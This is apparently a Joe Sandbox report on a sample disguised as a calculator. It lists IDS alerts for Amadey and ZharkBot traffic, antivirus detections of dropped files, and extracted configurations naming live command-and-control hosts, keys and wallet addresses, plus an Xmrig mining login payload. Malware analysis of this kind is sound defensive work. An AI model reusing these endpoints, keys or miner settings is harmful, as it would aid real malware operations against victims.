ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:44.911065+0200
SID:	2044597
Severity:	1
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:30.703441+0200
SID:	2054413
Severity:	1
Source Port:	49793
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:44.088234+0200
SID:	2054413
Severity:	1
Source Port:	50055
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:15.714539+0200
SID:	2054413
Severity:	1
Source Port:	49757
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:45.455821+0200
SID:	2054413
Severity:	1
Source Port:	49942
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:15.575729+0200
SID:	2054413
Severity:	1
Source Port:	50005
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:21.204157+0200
SID:	2054413
Severity:	1
Source Port:	49894
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:09.675761+0200
SID:	2054413
Severity:	1
Source Port:	49872
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:53.452956+0200
SID:	2054413
Severity:	1
Source Port:	50180
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:15.762423+0200
SID:	2044696
Severity:	1
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:57.455408+0200
SID:	2054413
Severity:	1
Source Port:	49967
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:57.037365+0200
SID:	2054413
Severity:	1
Source Port:	50188
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:43.105102+0200
SID:	2054413
Severity:	1
Source Port:	50159
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:15.411839+0200
SID:	2054413
Severity:	1
Source Port:	50108
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:54.585505+0200
SID:	2054413
Severity:	1
Source Port:	49844
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:17.127814+0200
SID:	2054413
Severity:	1
Source Port:	49886
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:06.094651+0200
SID:	2054413
Severity:	1
Source Port:	50094
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:34.416672+0200
SID:	2054413
Severity:	1
Source Port:	49800
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:25.141764+0200
SID:	2054413
Severity:	1
Source Port:	49903
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:53.545916+0200
SID:	2054413
Severity:	1
Source Port:	50070
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:10.460520+0200
SID:	2054413
Severity:	1
Source Port:	49994
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:49.716176+0200
SID:	2054413
Severity:	1
Source Port:	50171
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:33.458067+0200
SID:	2054413
Severity:	1
Source Port:	49799
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:34.335942+0200
SID:	2054413
Severity:	1
Source Port:	50039
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:19.818891+0200
SID:	2054413
Severity:	1
Source Port:	49892
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:25.664505+0200
SID:	2044597
Severity:	1
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:54.872416+0200
SID:	2054413
Severity:	1
Source Port:	50073
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:21.742570+0200
SID:	2803270
Severity:	2
Source Port:	49772
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:42:21.742570+0200
SID:	2054413
Severity:	1
Source Port:	49772
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:49.710044+0200
SID:	2054413
Severity:	1
Source Port:	49950
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:24.514695+0200
SID:	2803270
Severity:	2
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:24.514695+0200
SID:	2054413
Severity:	1
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:24.728204+0200
SID:	2803270
Severity:	2
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:24.728204+0200
SID:	2054413
Severity:	1
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:27.075547+0200
SID:	2054413
Severity:	1
Source Port:	50129
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:42.800839+0200
SID:	2054413
Severity:	1
Source Port:	49937
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:10.855944+0200
SID:	2054413
Severity:	1
Source Port:	49874
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:45:32.374343+0200
SID:	2054413
Severity:	1
Source Port:	50138
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:28.462132+0200
SID:	2054413
Severity:	1
Source Port:	50027
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:48.289241+0200
SID:	2054413
Severity:	1
Source Port:	49948
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:23.175837+0200
SID:	2803270
Severity:	2
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 185.216.214.225

Timestamp:	2024-08-31T22:42:23.175837+0200
SID:	2054413
Severity:	1
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Amadey Bot Activity (POST) M1 - Source IP: 192.168.2.4 - Destination IP: 185.215.113.19

Timestamp:	2024-08-31T22:42:29.747615+0200
SID:	2044597
Severity:	1
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:43:47.082115+0200
SID:	2054413
Severity:	1
Source Port:	49944
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE ZharkBot User-Agent Observed - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-31T22:44:02.520854+0200
SID:	2054413
Severity:	1
Source Port:	49978
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: trSK2fqPeB.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Avira: detection malicious, Label: HEUR/AGEN.1313066
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\52i[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1358722
Source: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe	Avira: detection malicious, Label: TR/Spy.RedLine.avuvz
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\kitty[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1319014
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Avira: detection malicious, Label: HEUR/AGEN.1358722
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Avira: detection malicious, Label: HEUR/AGEN.1319014
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Avira: detection malicious, Label: HEUR/AGEN.1319014
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Avira: detection malicious, Label: HEUR/AGEN.1313066
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Avira: detection malicious, Label: HEUR/AGEN.1358722
Source: C:\Users\user\Windows.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\Pictures\Illumination.pif	Avira: detection malicious, Label: TR/Dropper.Gen7

Found malware configuration

Source: 00000011.00000002.2156164658.0000000003011000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["exonic-hacks.com"], "Port": "1920", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: 0.2.trSK2fqPeB.exe.12b7dbd4.1.unpack	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.19/CoreOPT/index.php", "Version": "4.41", "Install Folder": "417fd29867", "Install File": "ednfoki.exe"}
Source: 41.0.xzzrvckwuia.exe.f00000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["185.208.158.139:27667"], "Bot Id": "button1"}

Multi AV Scanner detection for domain / URL

Source: 2x.si	Virustotal: Detection: 15%			Perma Link
Source: exonic-hacks.com	Virustotal: Detection: 20%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	ReversingLabs: Detection: 95%
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Virustotal: Detection: 86%	Perma Link
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	ReversingLabs: Detection: 95%
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Virustotal: Detection: 86%	Perma Link
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	ReversingLabs: Detection: 91%
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Virustotal: Detection: 82%	Perma Link
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	ReversingLabs: Detection: 91%
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Virustotal: Detection: 82%	Perma Link
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	ReversingLabs: Detection: 95%
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Virustotal: Detection: 86%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\52i[1].exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\52i[1].exe	Virustotal: Detection: 61%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ovrflw[1].exe	Virustotal: Detection: 40%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\kitty[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\kitty[1].exe	Virustotal: Detection: 86%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Virustotal: Detection: 61%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Virustotal: Detection: 86%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Virustotal: Detection: 40%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Virustotal: Detection: 86%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe	Virustotal: Detection: 63%	Perma Link
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Virustotal: Detection: 61%	Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Virustotal: Detection: 40%	Perma Link
Source: C:\Users\user\Pictures\Illumination.pif	ReversingLabs: Detection: 34%
Source: C:\Users\user\Pictures\Illumination.pif	Virustotal: Detection: 31%	Perma Link
Source: C:\Users\user\Windows.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\Windows.exe	Virustotal: Detection: 86%	Perma Link

Multi AV Scanner detection for submitted file

Source: trSK2fqPeB.exe	ReversingLabs: Detection: 18%
Source: trSK2fqPeB.exe	Virustotal: Detection: 31%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\52i[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\kitty[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ovrflw[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Windows.exe	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack	String decryptor: exonic-hacks.com
Source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack	String decryptor: 1920
Source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack	String decryptor: <123456789>
Source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack	String decryptor: <Xwormmm>
Source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack	String decryptor: NewAged
Source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack	String decryptor: USB.exe
Source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack	String decryptor: %Userprofile%
Source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack	String decryptor: Windows.exe
Source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack	String decryptor: bc1qvjral4f3vdvgp4ep5al5a08zxl3ympwr208tef
Source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack	String decryptor: 0x8bF11EF53522Af8409ed77b05B1C5A0059F14571
Source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack	String decryptor: TRC20_Address

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 26.2.aspnet_compiler.exe.20d578bc530.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 46.2.AddInProcess.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 46.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.aspnet_compiler.exe.20d578bc530.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002E.00000002.4156132656.00000272D94EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.4108997136.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.4108997136.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.4181122584.0000020D57D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.4181122584.0000020D57868000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.4108997136.0000000140799000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 4628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess.exe PID: 416, type: MEMORYSTR

Detected Stratum mining protocol

Source: global traffic

TCP traffic: 192.168.2.4:49835 -> 161.35.34.195:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"rvn:rr7xqnc8dkltgqoubpdvpnvyh2avubcjxj.rig","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.

Found strings related to Crypto-Mining

Source: aspnet_compiler.exe, 0000001A.00000002.4181122584.0000020D57868000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: aspnet_compiler.exe, 0000001A.00000002.4181122584.0000020D57D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: aspnet_compiler.exe, 0000001A.00000002.4181122584.0000020D57868000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: aspnet_compiler.exe, 0000001A.00000002.4181122584.0000020D57D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: aspnet_compiler.exe, 0000001A.00000002.4181122584.0000020D57D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: aspnet_compiler.exe, 0000001A.00000002.4181122584.0000020D57D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: XMRig 6.21.0

Source: unknown	HTTPS traffic detected: 172.67.143.156:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.143.156:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50043 version: TLS 1.2

Source: trSK2fqPeB.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: F:\IlluminatedControls\Simple-Calculator-master\obj\Release\Simple Calculator.pdb source: trSK2fqPeB.exe
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 52i.exe, 00000003.00000002.1805008168.00000202F8254000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1805008168.00000202F8196000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1750085970.00000202806B0000.00000004.08000000.00040000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2247277729.000001CD290A4000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2247277729.000001CD290A2000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2051647717.000001CD18A95000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: F:\IlluminatedControls\Simple-Calculator-master\obj\Release\Simple Calculator.pdbb source: trSK2fqPeB.exe
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 52i.exe, 00000003.00000002.1805008168.00000202F8254000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1805008168.00000202F8196000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1750085970.00000202806B0000.00000004.08000000.00040000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2247277729.000001CD290A4000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2247277729.000001CD290A2000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2051647717.000001CD18A95000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 52i.exe, 00000003.00000002.1805008168.00000202F80F5000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1749075284.0000020280530000.00000004.08000000.00040000.00000000.sdmp, 52i.exe, 00000003.00000002.1805008168.00000202F8196000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2092329177.000002B28006E000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2158620640.000002B290676000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2065045219.0000018157F90000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.0000018168445000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.00000181684E6000.00000004.00000800.00020000.00000000.sdmp
